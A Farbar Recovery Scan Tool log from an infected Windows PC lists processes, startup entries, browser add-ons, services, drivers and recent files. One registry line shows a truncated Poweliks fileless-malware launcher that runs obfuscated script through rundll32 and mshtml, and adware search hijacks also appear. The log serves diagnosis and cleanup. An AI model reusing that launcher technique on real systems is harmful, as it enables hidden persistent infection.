(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [LTCM Client] => C:\Program Files\LTCM Client\ltcmClient.exe [1596096 2009-08-05] (Leader Technologies Inc.)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5223016 2014-10-23] (AVAST Software)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-10-23]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-10-23]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-10-23] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-23] (Avast Software)
R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\windows\system32\drivers\aswHwid.sys [24184 2014-10-23] ()
R2 aswMonFlt; C:\windows\system32\drivers\aswMonFlt.sys [70384 2014-10-23] (AVAST Software)
R1 aswRdr; C:\windows\system32\drivers\aswRdr2.sys [81768 2014-10-23] (AVAST Software)
R0 aswRvrt; C:\windows\system32\Drivers\aswRvrt.sys [49944 2014-10-23] ()
R1 aswSnx; C:\windows\system32\drivers\aswSnx.sys [787800 2014-10-23] (AVAST Software)
R1 aswSP; C:\windows\system32\drivers\aswSP.sys [422760 2014-10-23] (AVAST Software)
R2 aswStm; C:\windows\system32\drivers\aswStm.sys [91496 2014-10-23] (AVAST Software)
R0 aswVmm; C:\windows\system32\Drivers\aswVmm.sys [206248 2014-10-23] ()
R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [15384 2014-01-07] ()
S3 EsgScanner; C:\windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [30976 2014-10-20] ()
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-24] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [218192 2014-10-23] (Avast Software)
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-24 19:32 - 2014-10-24 19:34 - 00020605 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-24 19:30 - 2014-10-24 19:32 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-24 18:57 - 01103360 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:15 - 2014-10-24 19:15 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00002240 _____ () C:\Users\Jude\Desktop\SpyHunter.lnk
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\sh4ldr
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-23 22:15 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 22:11 - 2014-10-23 22:10 - 00728960 _____ (Enigma Software Group USA, LLC.) C:\Users\Jude\Documents\SpyHunter-Installer.exe
2014-10-23 21:07 - 2014-10-23 21:10 - 00021301 _____ () C:\Users\Jude\Desktop\dds.txt
2014-10-23 21:07 - 2014-10-23 21:10 - 00008670 _____ () C:\Users\Jude\Desktop\attach.txt
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:58 - 2014-10-23 21:00 - 00002498 _____ () C:\Users\Jude\Desktop\Rkill.txt
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
2014-10-23 20:32 - 2014-10-23 20:32 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\AVAST Software
2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:29 - 2014-10-23 20:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2014-10-23 20:28 - 2014-10-23 20:28 - 00787800 _____ (AVAST Software) C:\windows\system32\Drivers\aswSnx.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00422760 _____ (AVAST Software) C:\windows\system32\Drivers\aswSP.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00291352 _____ (AVAST Software) C:\windows\system32\aswBoot.exe
2014-10-23 20:28 - 2014-10-23 20:28 - 00206248 _____ () C:\windows\system32\Drivers\aswVmm.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00091496 _____ (AVAST Software) C:\windows\system32\Drivers\aswStm.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00081768 _____ (AVAST Software) C:\windows\system32\Drivers\aswRdr2.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00070384 _____ (AVAST Software) C:\windows\system32\Drivers\aswMonFlt.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00049944 _____ () C:\windows\system32\Drivers\aswRvrt.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00043152 _____ (AVAST Software) C:\windows\avastSS.scr
2014-10-23 20:28 - 2014-10-23 20:28 - 00024184 _____ () C:\windows\system32\Drivers\aswHwid.sys
2014-10-23 20:27 - 2014-10-23 20:27 - 00000000 ____D () C:\Program Files\AVAST Software
2014-10-23 20:25 - 2014-10-23 20:27 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 19:40 - 2014-10-23 19:41 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:35 - 2014-10-22 23:34 - 00272808 _____ (Oracle Corporation) C:\windows\system32\javaws.exe
2014-10-22 23:34 - 2014-10-22 23:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-22 23:34 - 2014-10-22 23:34 - 00175528 _____ (Oracle Corporation) C:\windows\system32\javaw.exe
2014-10-22 23:34 - 2014-10-22 23:34 - 00175528 _____ (Oracle Corporation) C:\windows\system32\java.exe
2014-10-22 23:34 - 2014-10-22 23:34 - 00096680 _____ (Oracle Corporation) C:\windows\system32\WindowsAccessBridge.dll
2014-10-22 23:34 - 2014-10-22 23:34 - 00000000 ____D () C:\Program Files\Java
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 21:34 - 2014-10-20 21:34 - 00000000 ____D () C:\Program Files\ESET
2014-10-20 21:07 - 2014-10-20 21:07 - 00030976 _____ () C:\windows\system32\Drivers\hitmanpro37.sys
2014-10-20 21:07 - 2014-10-20 21:07 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-20 20:22 - 2014-10-21 17:48 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-24 19:26 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
